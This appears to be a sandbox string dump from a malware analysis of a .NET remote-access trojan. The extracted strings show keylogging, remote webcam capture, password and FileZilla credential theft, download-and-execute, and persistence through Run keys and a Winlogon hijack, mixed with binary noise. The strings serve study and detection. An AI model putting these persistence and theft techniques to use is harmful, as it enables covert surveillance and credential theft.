'()* ,-./0
&'()* ,-./
&'()* ,-./
&'()* ,-./012345
&'()* ,-./012345
3456789
3456789
.ASex
.ASex
!"#$%&'()* ,-./012
!"#$%&'()* ,-./012
!"#$%&'()
!"#$%&'()
?msodatad.dat
?msodatad.dat
msodatalast.dat
msodatalast.dat
Unicows.dll
Unicows.dll
Kernel32.dll
Kernel32.dll
SHLWAPI.DLL
SHLWAPI.DLL
GDI32.DLL
GDI32.DLL
wintrust.dll
wintrust.dll
1108160
1108160
0u.hN
0u.hN
0SSh
0SSh
t.WWWj
t.WWWj
PSSh07
PSSh07
t5SSh(
t5SSh(
PSSSSSSh
PSSSSSSh
0SSSSh
0SSSSh
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
GDI32.dll
GDI32.dll
KERNEL32.dll
KERNEL32.dll
OLEACC.dll
OLEACC.dll
OLEAUT32.dll
OLEAUT32.dll
MSVCRT.dll
MSVCRT.dll
RPCRT4.dll
RPCRT4.dll
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
urlmon.dll
urlmon.dll
USER32.dll
USER32.dll
VERSION.dll
VERSION.dll
WININET.dll
WININET.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ReportEventA
ReportEventA
ReportEventW
ReportEventW
RegEnumKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
RegQueryInfoKeyA
RegQueryInfoKeyW
RegQueryInfoKeyW
GetProcessHeap
GetProcessHeap
GetSystemWindowsDirectoryW
GetSystemWindowsDirectoryW
_amsg_exit
_amsg_exit
_acmdln
_acmdln
ShellExecuteExA
ShellExecuteExA
UrlGetPartA
UrlGetPartA
CreateURLMoniker
CreateURLMoniker
CreateDialogIndirectParamA
CreateDialogIndirectParamA
EnumWindows
EnumWindows
HttpQueryInfoA
HttpQueryInfoA
HttpSendRequestExA
HttpSendRequestExA
HttpOpenRequestA
HttpOpenRequestA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
HttpEndRequestA
HttpEndRequestA
dw20.pdb
dw20.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
\devsplab1\otools\BBT_TEMP\DW20O.pdb
winword.exe
winword.exe
wwordlt.exe
wwordlt.exe
excel.exe
excel.exe
excellt.exe
excellt.exe
mspub.exe
mspub.exe
frontpg.exe
frontpg.exe
outlook.exe
outlook.exe
powerpnt.exe
powerpnt.exe
powpntlt.exe
powpntlt.exe
onenote.exe
onenote.exe
infopath.exe
infopath.exe
winproj.exe
winproj.exe
ois.exe
ois.exe
visio.exe
visio.exe
`!`'`)` `
`!`'`)` `
e%f-f|3 f'f/f
e%f-f|3 f'f/f
]!^"^#^ ^$^
]!^"^#^ ^$^
t.uGuHu
t.uGuHu
x4x7x%x-x x
x4x7x%x-x x
h&h(h.hMh:h%h h,k/k-k1k4kmk
h&h(h.hMh:h%h h,k/k-k1k4kmk
k%lzmcmdmvm
k%lzmcmdmvm
^Q]Q~NzP}P\PGPCPLPZPIPePvPNPUPuPtPwPOP
^Q]Q~NzP}P\PGPCPLPZPIPePvPNPUPuPtPwPOP
]8^6^3^7^
]8^6^3^7^
ichczc]eVeQeYeWe_UOeXeUeTe
ichczc]eVeQeYeWe_UOeXeUeTe
{1{ {-{/{2{8{
{1{ {-{/{2{8{
r6s%s4s)s:t*t3t"t%t5t6t4t/t
r6s%s4s)s:t*t3t"t%t5t6t4t/t
t&t(t%u&ukuju
t&t(t%u&ukuju
WHX%X
WHX%X
`IaJa aEa6a2a.aFa/aOa)a@a bh
`IaJa aEa6a2a.aFa/aOa)a@a bh
d@d%d'd
d@d%d'd
duewexei
duewexei
kCpDpJpHpIpEpFp
kCpDpJpHpIpEpFp
S$S%S&S'S(S)S S,S.S2S3S5S6S8S:S;SBSFSKSNSOSPSUSVSXSYS[S]S_SbSdSeSgShSiSjSkSmStSvSzS}S~S
S$S%S&S'S(S)S S,S.S2S3S5S6S8S:S;SBSFSKSNSOSPSUSVSXSYS[S]S_SbSdSeSgShSiSjSkSmStSvSzS}S~S
U U!U"U#U$U%U(U)U U:U=U?UBUGUIULUSUTUXUYUZU[U]U`UgUhUiUkUlUmUnUoUpUqUrUsUtUxUyUzU
U U!U"U#U$U%U(U)U U:U=U?UBUGUIULUSUTUXUYUZU[U]U`UgUhUiUkUlUmUnUoUpUqUrUsUtUxUyUzU
c c!c"c#c$c%c&c'c.c0c1c5c7c?cRcSc[c\c]c^c_c`cacbcccdcfcjclcsctcyc~c
c c!c"c#c$c%c&c'c.c0c1c5c7c?cRcSc[c\c]c^c_c`cacbcccdcfcjclcsctcyc~c
m!m#m$m&mCmDmEmFmGmHmImJmKmLmMmNmOmPmQmRmSmTmUmVmWm[m\m]mkmqmrmsm
m!m#m$m&mCmDmEmFmGmHmImJmKmLmMmNmOmPmQmRmSmTmUmVmWm[m\m]mkmqmrmsm
nRsSsh
nRsSsh
evg%f
evg%f
m.tRa
m.tRa
gtr%x
gtr%x
Q%SKg
Q%SKg
f.ebp>QI
f.ebp>QI
y.yxT
y.yxT
fn:q%uN
fn:q%uN
aw.Toiz
aw.Toiz
RMeXe
RMeXe
S#S$S%S;ScSdSrSsStSuS
S#S$S%S;ScSdSrSsStSuS
`!`"`&`'`)`*` `,`-`.`/`0`2`3`4`5`6`:`=`>`?`
`!`"`&`'`)`*` `,`-`.`/`0`2`3`4`5`6`:`=`>`?`
^ ^!^"^#^$^%^&^'^.^}^
^ ^!^"^#^$^%^&^'^.^}^
c c!c"c#c$c%c&c'c*c7c:c;cSc[c1e?e@eAeBeCeDeEe
c c!c"c#c$c%c&c'c*c7c:c;cSc[c1e?e@eAeBeCeDeEe
f f!f"f#f$f%f&f'f(f)f*f f,f-f
f f!f"f#f$f%f&f'f(f)f*f f,f-f
m m!m"m#m$m%m&m'm(m)m*m m,m-m.m1m2m3m4m5m6m7m8m9m:m;mm?m@mBmCmDmGmHmImJmKmLmMmNmOmPmQmRmSmTmUm
m m!m"m#m$m%m&m'm(m)m*m m,m-m.m1m2m3m4m5m6m7m8m9m:m;mm?m@mBmCmDmGmHmImJmKmLmMmNmOmPmQmRmSmTmUm
u u-u.uFuGuHuIuJuKuLuMuNuOuPuQuRuSu
u u-u.uFuGuHuIuJuKuLuMuNuOuPuQuRuSu
U U!U"U#U$U%U&U'U(U4UJU
U U!U"U#U$U%U&U'U(U4UJU
](^)^*^ ^,^-^/^0^1^
](^)^*^ ^,^-^/^0^1^
m/mAmFmVmWmXmYmZm[m\m]m^m_m`mambmcmdmemfmgmhmimjmkmlmmmnmompmqmrmsmtmumvmwmxmymzm{m|m}m~m
m/mAmFmVmWmXmYmZm[m\m]m^m_m`mambmcmdmemfmgmhmimjmkmlmmmnmompmqmrmsmtmumvmwmxmymzm{m|m}m~m
x x!x"x#x$x%x'x(x)x*x x,x.x/x0x1x2x3x4x5x6x7x8x9x:x;xx?x@xAxXy_yaycydyeygyiyjykylynyoy
x x!x"x#x$x%x'x(x)x*x x,x.x/x0x1x2x3x4x5x6x7x8x9x:x;xx?x@xAxXy_yaycydyeygyiyjykylynyoy
} }!}"}#}$}%}&}'}
} }!}"}#}$}%}&}'}
] ]!]"]#]$]%]&]'](])]*] ],]-].]/]0]
] ]!]"]#]$]%]&]'](])]*] ],]-].]/]0]
]2^3^4^5^6^7^8^9^:^;^^
]2^3^4^5^6^7^8^9^:^;^^
cMeNeOePeQeReSeTeUeWeXeYeZe[e]ebe
cMeNeOePeQeReSeTeUeWeXeYeZe[e]ebe
X X!X"X#X$X%X&X'X(X)X*X X,X-X.X/X0X1X3X4X6X7X8X9X:X;XX?X@XAXBXCXDXEXFXGXHXJXTX_X`XfXmX
X X!X"X#X$X%X&X'X(X)X*X X,X-X.X/X0X1X3X4X6X7X8X9X:X;XX?X@XAXBXCXDXEXFXGXHXJXTX_X`XfXmX
d%d-d0d=dRdad2e\e^e_e`eaecedeeefegeheiejele
d%d-d0d=dRdad2e\e^e_e`eaecedeeefegeheiejele
s"s#s$s%s&s(s)s,s-s/s0s1s2s3s4s5s6s8s9s>s@sGs
s"s#s$s%s&s(s)s,s-s/s0s1s2s3s4s5s6s8s9s>s@sGs
u$u%u&u/ujukulumunuouqurusutu
u$u%u&u/ujukulumunuouqurusutu
duewexeyeze{e
duewexeyeze{e
~ ~!~"~#~$~%~&~'~(~*~ ~-~8~:~0
~ ~!~"~#~$~%~&~'~(~*~ ~-~8~:~0
| |!|"|#|$|%|&|(|)|*|-|.|/|0|1|2|6|
| |!|"|#|$|%|&|(|)|*|-|.|/|0|1|2|6|
{3~3}3|3
{3~3}3|3
eZl%u
eZl%u
Q.YeY
Q.YeY
R:\Sg|p5rL
R:\Sg|p5rL
e$e#e e4e5e7e6e8eKuHeVeUeMeXe^e]erexei
e$e#e e4e5e7e6e8eKuHeVeUeMeXe^e]erexei
s4s/s)s%s>sNsOs
s4s/s)s%s>sNsOs
s&t*t)t.tbt
s&t*t)t.tbt
2%2.bx
2%2.bx
{ | }9},
{ | }9},
d6exe9j
d6exe9j
]%sOu4](n
]%sOu4](n
m.t.zB}
m.t.zB}
w%xIyWy
w%xIyWy
^vcÓv
^vcÓv
%f?iCt
%f?iCt
U>_.lE
U>_.lE
f.ebp
f.ebp
.nrR=
.nrR=
{fn:q%uN
{fn:q%uN
cgjrsnhu.exe
cgjrsnhu.exe
name="Microsoft.Windows.ErrorReporter"
name="Microsoft.Windows.ErrorReporter"
version="5.1.0.0"
version="5.1.0.0"
publicKeyToken="6595b64144ccf1df" />
publicKeyToken="6595b64144ccf1df" />
Windows Error Reporting
Windows Error Reporting
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
1%s\%s\%s\%s\%s\%s\%s\%s
1%s\%s\%s\%s\%s\%s\%s\%s
AppName: %s AppVer: %s AppStamp:%s
AppName: %s AppVer: %s AppStamp:%s
ModName: %s ModVer: %s ModStamp:%s
ModName: %s ModVer: %s ModStamp:%s
fDebug: %s Offset: %s
fDebug: %s Offset: %s
Main_AlwaysReportBtn=
Main_AlwaysReportBtn=
Main_NoReportBtn=
Main_NoReportBtn=
Main_ReportBtn=
Main_ReportBtn=
General_Reportee=
General_Reportee=
CheckBoxRegKey=
CheckBoxRegKey=
ReportingFlags=
ReportingFlags=
Stage1URL=
Stage1URL=
Stage2URL=
Stage2URL=
%General_Reportee%
%General_Reportee%
%u %s
%u %s
%u.%u %s
%u.%u %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
%s %s %s %s in %s %s %s fDebug %s at offset %s
Bucket: d
Bucket: d
BucketTable %d
BucketTable %d
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
%s, %s, %s, %s, %s, %s, %s, %s, %s, %s %s
\dw.log
\dw.log
policy.txt
policy.txt
crash.log
crash.log
status.txt
status.txt
hits.log
hits.log
count.txt
count.txt
%s\%s\%s
%s\%s\%s
%s\%s\%s\%s
%s\%s\%s\%s
eDWQueuedReporting
eDWQueuedReporting
DWPersistentQueuedReporting
DWPersistentQueuedReporting
"%s\%s" -%c
"%s\%s" -%c
dwtrig20.exe
dwtrig20.exe
ReportSize=
ReportSize=
\*.cab
\*.cab
dwq.snt
dwq.snt
"%s" -%c %u
"%s" -%c %u
SEventSystem.EventSubscription
SEventSystem.EventSubscription
SubscriptionID=%s
SubscriptionID=%s
#$%&%&'(
#$%&%&'(
Comctl32.dll
Comctl32.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\DAA5A.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\DAA5A.dmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
.NET Runtime 2.0 Error Reporting
.NET Runtime 2.0 Error Reporting
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\dw.log
Microsoft Application Error Reporting
Microsoft Application Error Reporting
11.0.8160
11.0.8160
Windows
Windows
DW20.Exe
DW20.Exe
system.exe_2448_rwx_00400000_0003E000:
.text
.text
`.rsrc
`.rsrc
@.reloc
@.reloc
%fZ_.
%fZ_.
.Dr*1
.Dr*1
pEXE
pEXE
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
lSystem.Resources.ResourceReader, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
>z.Js
>z.Js
G^.ug
G^.ug
T0OR[.MP
T0OR[.MP
xD9_.CU
xD9_.CU
Gjf%d
Gjf%d
B.Zh#
B.Zh#
.wSL{c
.wSL{c
v2.0.50727
v2.0.50727
System.Threading
System.Threading
Microsoft.VisualBasic
Microsoft.VisualBasic
Operators
Operators
Microsoft.VisualBasic.CompilerServices
Microsoft.VisualBasic.CompilerServices
System.Net.Sockets
System.Net.Sockets
System.Diagnostics
System.Diagnostics
System.Text
System.Text
WebClient
WebClient
System.Net
System.Net
System.IO
System.IO
WebHeaderCollection
WebHeaderCollection
System.ComponentModel
System.ComponentModel
System.Collections.Generic
System.Collections.Generic
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.Devices
Microsoft.VisualBasic.MyServices
Microsoft.VisualBasic.MyServices
TcpClient
TcpClient
System.Drawing
System.Drawing
System.Windows.Forms
System.Windows.Forms
SendKeys
SendKeys
System.Drawing.Drawing2D
System.Drawing.Drawing2D
CopyPixelOperation
CopyPixelOperation
System.Security.Cryptography
System.Security.Cryptography
System.Drawing.Imaging
System.Drawing.Imaging
System.IO.Compression
System.IO.Compression
AForge.Video.DirectShow
AForge.Video.DirectShow
AForge.Video
AForge.Video
System.Collections
System.Collections
System.Runtime.CompilerServices
System.Runtime.CompilerServices
System.Reflection
System.Reflection
System.Runtime.InteropServices
System.Runtime.InteropServices
Keyboard
Keyboard
Keys
Keys
System.Security
System.Security
System.Security.AccessControl
System.Security.AccessControl
System.Security.Principal
System.Security.Principal
System.Resources
System.Resources
Microsoft.VisualBasic.ApplicationServices
Microsoft.VisualBasic.ApplicationServices
InvalidOperationException
InvalidOperationException
System.Configuration
System.Configuration
System.Collections.ObjectModel
System.Collections.ObjectModel
Microsoft.VisualBasic.FileIO
Microsoft.VisualBasic.FileIO
System.Timers
System.Timers
Microsoft.Win32
Microsoft.Win32
System.Management
System.Management
RegistryKey
RegistryKey
WebBrowser
WebBrowser
System.Net.NetworkInformation
System.Net.NetworkInformation
WindowsIdentity
WindowsIdentity
WindowsPrincipal
WindowsPrincipal
WindowsBuiltInRole
WindowsBuiltInRole
System.Text.RegularExpressions
System.Text.RegularExpressions
PortableExecutable
PortableExecutable
JLibrary.PortableExecutable
JLibrary.PortableExecutable
System.Globalization
System.Globalization
.ctor
.ctor
GetExecutingAssembly
GetExecutingAssembly
get_Keyboard
get_Keyboard
get_ShiftKeyDown
get_ShiftKeyDown
get_Port
get_Port
ContainsKey
ContainsKey
get_ExecutablePath
get_ExecutablePath
set_UseShellExecute
set_UseShellExecute
OpenSubKey
OpenSubKey
CreateSubKey
CreateSubKey
set_Key
set_Key
b.Rummage.exe
b.Rummage.exe
winmm.dll
winmm.dll
user32.dll
user32.dll
GetKeyboardState
GetKeyboardState
MapVirtualKey
MapVirtualKey
SetWindowsHookEx
SetWindowsHookEx
User32.dll
User32.dll
UnhookWindowsHookEx
UnhookWindowsHookEx
GetKeyboardLayout
GetKeyboardLayout
kernel32.dll
kernel32.dll
ntdll.dll
ntdll.dll
advapi32.dll
advapi32.dll
.cctor
.cctor
Srclient.dll
Srclient.dll
registryKey_0
registryKey_0
wintrust.dll
wintrust.dll
SetThreadExecutionState
SetThreadExecutionState
RegOpenKeyEx
RegOpenKeyEx
tb.resources
tb.resources
ub.resources
ub.resources
b.Resources.resources
b.Resources.resources
System.Windows.Forms.Form
System.Windows.Forms.Form
My.MyProject.Forms
My.MyProject.Forms
4System.Web.Services.Protocols.SoapHttpClientProtocol
4System.Web.Services.Protocols.SoapHttpClientProtocol
$3a574e5b-bd2e-4e23-a175-583f6c78f50f
$3a574e5b-bd2e-4e23-a175-583f6c78f50f
0.0.0.0
0.0.0.0
_CorExeMain
_CorExeMain
mscoree.dll
mscoree.dll
$#%#'#(#)#*# #,#-#107686;:>=
$#%#'#(#)#*# #,#-#107686;:>=
HTTP POST
HTTP POST
hXXp://
hXXp://
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/
HTTP TIMEOUT
HTTP TIMEOUT
HTTP GET
HTTP GET
HEAD / HTTP/1.1
HEAD / HTTP/1.1
POST / HTTP/1.1
POST / HTTP/1.1
GET / HTTP/1.1
GET / HTTP/1.1
Downloaded and Executed File At:
Downloaded and Executed File At:
HTTPControl
HTTPControl
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\drivers\etc\hosts
PASSWORDS*
PASSWORDS*
Starting Remote Webcam
Starting Remote Webcam
WEBCAM*
WEBCAM*
Error Starting Remote Webcam:
Error Starting Remote Webcam:
.log.txt
.log.txt
21e4ae94-fc15-47ca-aae4-f06ec0e0544dec7443df-8698-4
21e4ae94-fc15-47ca-aae4-f06ec0e0544dec7443df-8698-4
b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
b, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
httpget
httpget
134f35e1-1a49-4c15-8a65-b6db57c3d3dcf2
134f35e1-1a49-4c15-8a65-b6db57c3d3dcf2
posthttp
posthttp
Cannot Get Saved Keylogs:
Cannot Get Saved Keylogs:
Cannot Read Saved Keylog:
Cannot Read Saved Keylog:
cmd.exe
cmd.exe
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
1314591
1314591
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
CMDOn
CMDOn
CMDOff
CMDOff
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
DisableCMD
DisableCMD
SAPI.Spvoice
SAPI.Spvoice
explorer.exe
explorer.exe
csrss.exe
csrss.exe
\\.\root\default
\\.\root\default
\uTorrent\uTorrent.exe
\uTorrent\uTorrent.exe
\qBittorrent\qbittorrent.exe
\qBittorrent\qbittorrent.exe
\BitTorrent\bittorrent.exe
\BitTorrent\bittorrent.exe
\BitTorrent\BitTorrent.exe
\BitTorrent\BitTorrent.exe
\Vuze\Azureus.exe
\Vuze\Azureus.exe
software\Microsoft\Windows\CurrentVersion\Run
software\Microsoft\Windows\CurrentVersion\Run
software\Microsoft\Windows\CurrentVersion\RunOnce
software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\RunOnce\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
Software\Microsoft\Windows\CurrentVersion\Run\
Software\Microsoft\Windows\CurrentVersion\Run\
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
{00AAC56B-CD44-11d0-8CC2-00C04FC295EE}
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
Specify a Password
Specify a Password
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
*Windows 8
*Windows 8
Windows 10
Windows 10
*Windows Vista
*Windows Vista
Windows 8
Windows 8
*Windows XP
*Windows XP
Windows 7
Windows 7
*Windows 10
*Windows 10
*Windows 7
*Windows 7
*Windows Server
*Windows Server
Windows
Windows
*Windows
*Windows
KEYLOGS*
KEYLOGS*
WEBCAM
WEBCAM
PASSWORDS
PASSWORDS
RESETPASSWORD
RESETPASSWORD
9454f305-8ee5-4fb2-aea3-b9ae9f1a985de3de48a9-d6e2-455d-8490-4d4d6a0a8e8147b7c1ef-394e-
9454f305-8ee5-4fb2-aea3-b9ae9f1a985de3de48a9-d6e2-455d-8490-4d4d6a0a8e8147b7c1ef-394e-
Invalid Webcam Driver Download URL, or Failed to Download File!
Invalid Webcam Driver Download URL, or Failed to Download File!
Cannot Load Webcam Driver:
Cannot Load Webcam Driver:
Opened Website:
Opened Website:
InternetExplorer.Application
InternetExplorer.Application
hXXp://cachefly.cachefly.net/5mb.test
hXXp://cachefly.cachefly.net/5mb.test
Win32_Processor.deviceid="CPU0"
Win32_Processor.deviceid="CPU0"
ms.ini
ms.ini
Invalid Password Recovery Download URL, or Failed to Download File!
Invalid Password Recovery Download URL, or Failed to Download File!
Cannot Recover Passwords. Error:
Cannot Recover Passwords. Error:
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_OperatingSystem
\FileZilla\recentservers.xml
\FileZilla\recentservers.xml
(. ?)\s . \s . \s . \s (. ?)\s (. ?)
(. ?)\s . \s . \s . \s (. ?)\s (. ?)
Password
Password
Cannot Obtain Passwords:
Cannot Obtain Passwords:
vbc.exe
vbc.exe
csc.exe
csc.exe
AppLaunch.exe
AppLaunch.exe
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
explorer.exe,"
explorer.exe,"
\clientsvr.exe
\clientsvr.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
userinit.exe,"
userinit.exe,"
clientsvr.exe
clientsvr.exe
:Zone.Identifier
:Zone.Identifier
b.Resources
b.Resources
system.exe_2448_rwx_009CD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%Documents and Settings%\%current user%\Local Settings\Temp\system.exe
%Documents and Settings%\%current user%\Local Settings\Temp\system.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
cgjrsnhu.exe_2480_rwx_0093D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.exe
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
DW20.EXE_2548_rwx_00ADD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE
C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
ping.exe_3908:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
iphlpapi.dll
iphlpapi.dll
USER32.dll
USER32.dll
WS2_32.dll
WS2_32.dll
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters
ping.pdb
ping.pdb
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
TCP/IP Ping Command
TCP/IP Ping Command
5.1.2600.5512 (xpsp.080413-0852)
5.1.2600.5512 (xpsp.080413-0852)
ping.exe
ping.exe
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Destination port unreachable.
Destination port unreachable.
Unable to initialize Windows Sockets interface, error code %1!d!.
Unable to initialize Windows Sockets interface, error code %1!d!.
%1 [%2] %0
%1 [%2] %0
%1 [%2] : %0
%1 [%2] : %0
svchost.exe_3856_rwx_012FD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
D:\375569\svchost.exe
D:\375569\svchost.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
ping.exe_3908_rwx_0084D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\ping.exe
%System%\ping.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
wmiprvse.exe_228_rwx_00DDD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\wbem\wmiprvse.exe
%System%\wbem\wmiprvse.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
wmiprvse.exe_228_rwx_00DFD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%System%\wbem\wmiprvse.exe
%System%\wbem\wmiprvse.exe
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
Explorer.EXE_532_rwx_00EDD000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%WinDir%\Explorer.EXE
%WinDir%\Explorer.EXE
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
USER32.DLL
USER32.DLL
Explorer.EXE_532_rwx_01E0D000_00007000:
GetProcessWindowStation
GetProcessWindowStation
ADVAPI32.dll
ADVAPI32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
ntdll.dll
ntdll.dll
KERNEL32.dll
KERNEL32.dll
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
zcÃ
zcÃ
%WinDir%\Explorer.EXE
%WinDir%\Explorer.EXE
mscoree.dll
mscoree.dll
kernel32.dll
kernel32.dll
- floating point support not loaded
- floating point support not loaded
- CRT not initialized
- CRT not initialized
- Attempt to initialize the CRT more than once.
